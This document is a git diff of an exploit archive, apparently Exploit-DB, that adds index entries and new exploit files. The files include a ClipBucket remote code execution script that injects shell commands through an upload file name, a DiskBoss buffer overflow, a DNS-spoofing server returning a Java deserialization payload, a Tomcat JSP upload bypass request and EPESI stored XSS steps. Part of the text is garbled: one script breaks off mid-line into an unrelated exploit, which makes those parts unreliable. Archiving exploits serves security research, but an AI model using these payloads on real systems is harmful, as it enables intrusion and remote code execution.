36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 - 'admin/index.php' Cross-Site Scripting",2011-10-03,"Stefan Schurtz",php,webapps,0 36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Unauthenticated Remote Code Execution",2015-03-01,"OJ Reeves",hardware,webapps,80 -36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 - 'index.php' Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0 -36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 - PHPrint.php Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0 -36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection",2011-10-15,"Aung Khant",php,webapps,0 +36203,platforms/php/webapps/36203.txt,"vTiger CRM 5.2.1 - 'index.php' Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0 +36204,platforms/php/webapps/36204.txt,"vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0 +36208,platforms/php/webapps/36208.txt,"vTiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection",2011-10-15,"Aung Khant",php,webapps,0 36262,platforms/windows/webapps/36262.txt,"SolarWinds Orion Service - SQL Injection",2015-03-04,"Brandon Perry",windows,webapps,0 36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0 @@ -35346,7 +35349,7 @@ id,file,description,date,author,platform,type,port 36252,platforms/php/webapps/36252.txt,"e107 0.7.24 - 'cmd' Parameter Remote Command Execution",2011-10-24,"Matt Bergin",php,webapps,0 36253,platforms/php/webapps/36253.txt,"InverseFlow 2.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-24,"Amir Expl0its",php,webapps,0 36254,platforms/php/webapps/36254.txt,"Alsbtain Bulletin 1.5/1.6 - Multiple Local File Inclusion",2011-10-25,"Null H4ck3r",php,webapps,0 -36255,platforms/php/webapps/36255.txt,"vtiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-10-26,LiquidWorm,php,webapps,0 +36255,platforms/php/webapps/36255.txt,"vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-10-26,LiquidWorm,php,webapps,0 36259,platforms/php/webapps/36259.txt,"eFront 3.6.10 - 'professor.php' Script Multiple SQL Injections",2011-10-28,"Vulnerability Research Laboratory",php,webapps,0 36265,platforms/php/webapps/36265.txt,"BEdita CMS 3.5.0 - Multiple Vulnerabilities",2015-03-04,"Edric Teo",php,webapps,80 36269,platforms/php/webapps/36269.txt,"SjXjV 2.3 - 'post.php' SQL Injection",2011-10-28,"599eme Man",php,webapps,0 @@ -36617,7 +36620,7 @@ id,file,description,date,author,platform,type,port 38339,platforms/php/webapps/38339.txt,"Centreon 2.6.1 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,php,webapps,80 38342,platforms/ios/webapps/38342.txt,"My.WiFi USB Drive 1.0 iOS - File Inclusion",2015-09-28,Vulnerability-Lab,ios,webapps,8080 38343,platforms/ios/webapps/38343.txt,"Photos in Wifi 1.0.1 iOS - Arbitrary File Upload",2015-09-28,Vulnerability-Lab,ios,webapps,0 -38345,platforms/php/webapps/38345.txt,"Vtiger CRM 6.3.0 - Authenticated Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",php,webapps,80 +38345,platforms/php/webapps/38345.txt,"vTiger CRM 6.3.0 - Authenticated Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",php,webapps,80 38350,platforms/hardware/webapps/38350.txt,"Western Digital My Cloud 04.01.03-421/04.01.04-422 - Command Injection",2015-09-29,absane,hardware,webapps,0 38351,platforms/asp/webapps/38351.txt,"Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (2)",2015-09-29,"Pedro Ribeiro",asp,webapps,0 38354,platforms/php/webapps/38354.txt,"Plogger - Multiple Input Validation Vulnerabilities",2013-03-02,"Saadat Ullah",php,webapps,0 @@ -38647,3 +38650,6 @@ id,file,description,date,author,platform,type,port 42939,platforms/jsp/webapps/42939.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps,0 42940,platforms/jsp/webapps/42940.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps,0 42947,platforms/hardware/webapps/42947.txt,"Fiberhome AN5506-04-F - Command Injection",2017-10-03,Tauco,hardware,webapps,0 +42950,platforms/php/webapps/42950.txt,"EPESI 1.8.2 rev20170830 - Cross-Site Scripting",2017-10-03,"Zeeshan Shaikh",php,webapps,0 +42953,platforms/windows/webapps/42953.txt,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution",2017-09-20,xxlegend,windows,webapps,0 +42954,platforms/php/webapps/42954.py,"ClipBucket 2.8.3 - Remote Code Execution",2017-10-04,"Meisam Monsef",php,webapps,0 diff --git a/platforms/bsd/local/36799.c b/platforms/bsd/dos/36799.c similarity index 100% rename from platforms/bsd/local/36799.c rename to platforms/bsd/dos/36799.c diff --git a/platforms/freebsd/local/19130.c b/platforms/freebsd/dos/19130.c similarity index 95% rename from platforms/freebsd/local/19130.c rename to platforms/freebsd/dos/19130.c index 9b86048fd..c046c3f99 100755 --- a/platforms/freebsd/local/19130.c +++ b/platforms/freebsd/dos/19130.c @@ -1,7 +1,8 @@ +/* source: http://www.securityfocus.com/bid/168/info A vulnerability in FreeBSD's UNIX-domain protocol implementation of file descriptor passing can cause the kernel to panic. - +*/ #include #include diff --git a/platforms/freebsd/local/20377.c b/platforms/freebsd/local/20377.c index b68ea63da..1ae680de1 100755 --- a/platforms/freebsd/local/20377.c +++ b/platforms/freebsd/local/20377.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/1895/info top is a program used to display system usage statistics in real time written by GoupSys Consulting but shipped by default as a core component with many operating systems. On BSD systems, top is installed setgid kmem so that it may read process information from kernel memory if executed by a user who does not have that privilege. @@ -7,6 +8,7 @@ top contains a format-string vulnerability that may lead to a compromise of effe If a malicious user gains egid kmem, vital information can be read from the kernel memory that may lead to a further elevation of privileges (most certainly root eventually). The versions of top that ships with FreeBSD prior to 4.2 are known to be vulnerable. It is likely that other systems are vulnerable (though none are confirmed yet). +*/ /* * freebsd x86 top exploit diff --git a/platforms/multiple/dos/42955.html b/platforms/multiple/dos/42955.html new file mode 100755 index 000000000..8a700850f --- /dev/null +++ b/platforms/multiple/dos/42955.html @@ -0,0 +1,20 @@ + + +function f() { + let o = {}; + for (let i in {xx: 0}) { + for (i of [0]) { + + } + + print(o[i]); + } +} + +f(); \ No newline at end of file diff --git a/platforms/php/webapps/21742.txt b/platforms/php/webapps/21742.txt index 9ecb0ee2e..eaa59b827 100755 --- a/platforms/php/webapps/21742.txt +++ b/platforms/php/webapps/21742.txt @@ -28,7 +28,7 @@ The following PoC (Proof of Concept) demonstrates the vulnerability:
- + diff --git a/platforms/php/webapps/21743.txt b/platforms/php/webapps/21743.txt index 01f803959..c085dfb66 100755 --- a/platforms/php/webapps/21743.txt +++ b/platforms/php/webapps/21743.txt @@ -1498,7 +1498,7 @@ Preconditions: none Test: http://pmbt/modrules.php?act=newsect& -res[text]=</textarea> +res[text]= ############################################################################### diff --git a/platforms/php/webapps/42950.txt b/platforms/php/webapps/42950.txt new file mode 100755 index 000000000..246b6c962 --- /dev/null +++ b/platforms/php/webapps/42950.txt @@ -0,0 +1,50 @@ +# Exploit Title: Multiple Stored XSS in EPESI +# Date: 10/03/2017 +# Exploit Author: Zeeshan Shaikh +# Vendor Homepage: http://epe.si/ +# Software Link: http://epe.si/download/ +# Version: 1.8.2 rev20170830 +# CVE : CVE-2017-14712 to CVE-2017-14717 +# Category: webapps + + +XSS 1 (Tasks - Title) +Steps to recreate: +1. Home->Tasks->add new +2. Enter title as "MYTITLE" and fill required details but don't click save +3. Start interceptor and intercept request +4. click save +5. Now replace MYTITLE with "alertme"(without +quotes) +6. Home->click on alertme + +XSS 2 (Tasks - Description) +Steps to recreate: +1. Create a new task and fill description as "MYDESC" but don't click on +save +2. Start intercepting request and then click save on browser +3. Now replace MYDESC with "" +4. Go to Home(make sure task applet is there) -> Mouseover on i icon + +XSS 3 (Tasks/Phonecall - Notes - Title) +Steps to recreate: +1. Home->Tasks/PhoneCall->Notes->add new +2. Steps same as XSS 1 +3. Click on alertme in notes section + +XSS 4 (Tasks - Alerts - Title) +Steps to recreate: +1. Home->Tasks->Notes->add new +2. Steps same as XSS 1 +3. Click on alertme in alerts section + +XSS 5 (Phonecalls - Subject) +Steps to recreate: +1. Create a new phonecall and fill subject as "MYSUB" but don't click on +save +2. Start intercepting request and then click save on browser +3. Now replace MYSUB with "" +4. Go to Home(make sure task applet is there) -> Mouseover on i icon + +XSS 6 (Phonecalls - Description) +Same as XSS 5 \ No newline at end of file diff --git a/platforms/php/webapps/42954.py b/platforms/php/webapps/42954.py new file mode 100755 index 000000000..6a7322779 --- /dev/null +++ b/platforms/php/webapps/42954.py @@ -0,0 +1,61 @@ +# Exploit Title: ClipBucket PHP Script Remote Code Execution (RCE) +# Date: 2017-10-04 +# Exploit Author: Esecurity.ir +# Vendor Homepage: https://clipbucket.com/ +# Version: 2.8.3 +# Exploit Code By : Meisam Monsef - Email : meisamrce@gmail.com - TelgramID : @meisamrce +# Usage Exploit : exploit.py http://target.com/path/ + + + +import sys,os +try: + import requests +except Exception as e: + print 'please install module requests!' + sys.exit() +img = 'temp.jpg' +uploadUrl = "api/file_uploader.php" +h = {'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'} + +def getShell(url): + try: + r = requests.get(url+'cache/1.log',headers=h) + if r.status_code == 200: + return r.content + else: + print 'Sorry site is not vulnerable ' + sys.exit() + except Exception as e: + print e + sys.exit() + +def exploit(url): + while (1): + cmd = raw_input('$') + if cmd == '' or cmd == 'exit': + break + file_ = {'Filedata': (img, open(img, 'r'),'image/jpg')} + data = {'file_name':'a.jpg;'+cmd+' > ../cache/1.log;a.jpg'} + try: + r = requests.post(url+uploadUrl, files=file_,data=data,headers=h) + if r.status_code == 200: + if '"success":"yes"' in r.content: + print getShell(url) + else: + print 'Sorry site is not vulnerable ' + break + else: + print 'Sorry site is not vulnerable ' + break + except Exception as e: + print e + break +if not os.path.exists(img): + print 'please create tiny image file name is ' + img + sys.exit() + +if len(sys.argv) == 2 : + exploit(sys.argv[1]) +else: + print "Usage Exploit : exploit.py http://target.com/path/"; \ No newline at end of file diff --git a/platforms/solaris/remote/19507.txt b/platforms/solaris/dos/19507.txt similarity index 100% rename from platforms/solaris/remote/19507.txt rename to platforms/solaris/dos/19507.txt diff --git a/platforms/windows/local/42951.py b/platforms/windows/local/42951.py new file mode 100755 index 000000000..44bb6ebba --- /dev/null +++ b/platforms/windows/local/42951.py @@ -0,0 +1,102 @@ +#!/usr/bin/python + +#======================================================================================================================== +# Exploit Author: C4t0ps1s +# Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(Code execution) +# Date: 03-10-2017 +# Twitter: @C4t0ps1s +# Email: C4t0ps1s@gmail.com +# Vulnerable Software: DiskBoss Enterprise v8.4.16 +# Vendor Homepage: http://www.diskboss.com +# Version: v8.4.16 +# Software Link: http://www.diskboss.com/downloads.html +# Tested On: Windows 10 x64 +# +# Code execution from the PoC of Touhid M.Shaikh: https://www.exploit-db.com/exploits/42917/ +# +# To reproduce the code execution: +# 1. Click Server +# 2. Click Connect +# 3. In the "Share Name" field, paste the content of shareName.txt , And try to connect +# +#======================================================================================================================== + +import struct + +buff = "a"*1312 + +#push esp | pop esi | retn 4 +buff += struct.pack(" /proc/sys/net/ipv4/ip_forward +#iptables -F INPUT +#iptables -F FORWARD +#iptables -F OUTPUT +#iptables -F -t nat +#iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT +#iptables -t nat -A POSTROUTING -s 192.168.85.0/24 ! -d 192.168.85.0/24 -j MASQUERADE +#iptables -P INPUT ACCEPT +#iptables -P FORWARD ACCEPT +#iptables -P OUTPUT ACCEPT + +# Then poison DNS requests to the www.ersdata.com domain: + +# DNS Spoof https://github.com/devleoper/arp-dns-spoof +# root@kali:/usr/share/arp-dns-spoof# cat dns_packet_spoof.py | egrep "domain =|localIP =" +# domain = 'www.ersdata.com' # domain to be spoofed +# localIP = '192.168.85.131' # IP address for poisoned hosts. + +# Run the request handler on the attacking machine, which will answer all requests with malicous serialized gadgets. For example: + +#!/usr/bin/python +import SocketServer, sys +from SimpleHTTPServer import SimpleHTTPRequestHandler + +# POST Handler +class HTTPHandler(SimpleHTTPRequestHandler): + def __init__(self,req,client_addr,server): + SimpleHTTPRequestHandler.__init__(self,req,client_addr,server) + def do_POST(self): + # java -jar ysoserial-master-v0.0.5-g1f2e7bf-14.jar CommonsCollections1 calc.exe > calc.bin + # python -c 'import binascii, re;print "\\x"+"\\x".join(re.findall("..",binascii.hexlify(open("calc.bin","rb").read())))' + response = ( "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x08\x63\x61\x6c\x63\x2e\x65\x78\x65\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a" + ) + self.send_response(200) + self.send_header("Content-type", "text/html") + self.send_header("Content-length", len(response)) + self.end_headers() + self.wfile.write(response) +try: + httpd = SocketServer.TCPServer(("", 3311), HTTPHandler) + print "Serving at port: ", 3311 + httpd.serve_forever() +except: + print "Exiting..." + diff --git a/platforms/windows/webapps/42953.txt b/platforms/windows/webapps/42953.txt new file mode 100755 index 000000000..215e1777a --- /dev/null +++ b/platforms/windows/webapps/42953.txt @@ -0,0 +1,22 @@ +# E-DB Note: https://www.alphabot.com/security/blog/2017/java/Apache-Tomcat-RCE-CVE-2017-12617.html + +When running on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request. +This JSP could then be requested and any code it contained would be executed by the server. + + The PoC is like this: + + PUT /1.jsp/ HTTP/1.1 + Host: 192.168.3.103:8080 + Upgrade-Insecure-Requests: 1 + User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Referer: http://192.168.3.103:8080/examples/ + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2 + Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94 + Connection: close + Content-Length: 26 + + <% out.println("hello");%> + +It is the bypass for CVE-2017-12615